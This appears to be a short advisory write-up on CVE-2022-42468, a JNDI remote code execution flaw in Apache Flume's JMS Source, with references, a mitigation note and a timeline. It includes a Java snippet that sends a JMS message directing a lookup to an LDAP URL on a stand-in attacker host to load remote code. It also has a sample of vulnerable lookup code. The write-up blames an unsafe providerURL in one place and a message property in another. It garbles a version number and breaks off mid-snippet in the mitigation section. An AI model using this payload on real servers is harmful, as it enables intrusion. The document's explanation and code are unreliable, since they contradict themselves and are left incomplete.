A critical security vulnerability has been discovered in Apache Flume, a popular distributed log collection and aggregation system, which allows an attacker to remotely execute arbitrary code on the affected server. This vulnerability is present in Apache Flume versions 1.4. through 1.10.1 when using a JMS Source with an unsafe providerURL. Fortunately, a patch has been released that addresses this critical issue by restricting the use of JNDI only to java protocol or no protocol.

Original References

Official Apache Flume CVE-2022-42468 Advisory: https://cwiki.apache.org/confluence/display/FLUME/%5BCVE-2022-42468%5D

GitHub Commit Fixing the issue: https://github.com/apache/flume/commit/cab3ba95cce507368e1dc01f1b2fb2c38d771da

Exploit Details

The exploit is triggered when an attacker sends a specially crafted JMS message to the affected Flume source, which contains an unsafe JNDI reference within the message's headers or properties. Upon receiving the malicious message, Flume will follow the JNDI reference in an attempt to resolve the object, ultimately leading to the execution of attacker-controlled code on the server.

A malicious JMS message is sent by the attacker

// Malicious JMS message creation
Message attackMsg = session.createMessage();
attackMsg.setStringProperty("jndiLookupUrl", "ldap://evilserver.com/maliciousObject");
producer.send(attackMsg);

The vulnerable Flume JMS Source processes the message

// Vulnerable Flume JMS Source code
public class JMSSource extends AbstractSource {

    public void handleMessage(Message msg) {
        // ... (omitted for brevity)

        // Unsafe JNDI lookup triggered by attacker's JMS message
        String jndiLookupUrl = msg.getStringProperty("jndiLookupUrl");
        InitialContext ctx = new InitialContext();
        Object obj = ctx.lookup(jndiLookupUrl);

        // ... (omitted for brevity)
    }
}

Mitigation

To protect your Apache Flume installation from this vulnerability, you should immediately upgrade to Flume version 1.10.2, which includes the fix for CVE-2022-42468. The patch enforces the use of the java protocol or no protocol for JNDI lookups, effectively preventing the remote code execution attack. The updated code snippet in Flume :@{

Timeline

Published on: 10/26/2022 16:15:00 UTC
Last modified on: 10/28/2022 17:41:00 UTC